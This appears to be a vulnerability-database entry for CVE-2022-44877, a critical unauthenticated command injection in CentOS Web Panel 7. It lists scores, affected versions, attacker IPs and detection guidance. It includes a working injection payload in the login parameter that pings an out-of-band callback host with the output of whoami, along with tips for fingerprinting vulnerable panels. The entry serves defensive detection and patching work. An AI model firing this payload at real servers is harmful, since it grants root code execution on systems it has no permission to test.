CVE-2022-44877
published 2023-01-05

Priority: P196 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability (due 2023-02-07)
Exploited in the wild
EPSS: 100.00% (100.0th percentile)

login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.

Affected

1 range

Vendor           | Product  | Version range | Fixed in
control-webpanel | webpanel | < 0.9.8.1147  | 0.9.8.1147

Detection & IOCs (extracted from sources)

path: /login/index.php
ip: 206.189.170.136
ip: 185.117.73.208
ip: 157.230.62.113
ip: 180.183.132.35
url: POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}})
command: ping${IFS}-nc${IFS}2${IFS}`whoami`

  • Use the Nuclei template matcher: look for HTTP 302 responses with body containing 'Login Redirect.' in response to a crafted POST to /login/index.php with shell metacharacters in the login parameter.
  • Fingerprint vulnerable CWP instances via Shodan or FOFA using the page title 'Login | Control WebPanel' before scanning for exploitation.
  • Successful exploitation results in code execution as the root user; the HTTP request blocks while the command runs and results are not returned in the HTTP response — use out-of-band (DNS/interactsh) detection.
  • The vulnerability is triggered when double quotes are used to log incorrect login entries to the system, allowing bash command injection — monitor CWP authentication logs for anomalous entries containing shell metacharacters.
  • Only CWP 7 versions before 0.9.8.1147 are vulnerable; instances already patched to 0.9.8.1147 or later are not affected.
  • According to Wiz data, CWP is not prevalent in cloud environments, so the risk of exploitation in cloud deployments is lower than in on-premises environments.

CVSS provenance

Source    | Version | Score | Severity | Vector
nvd       | v3.1    | 9.8   | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck |         | 9.8   | CRITICAL |
cisa      |         | 9.8   | CRITICAL |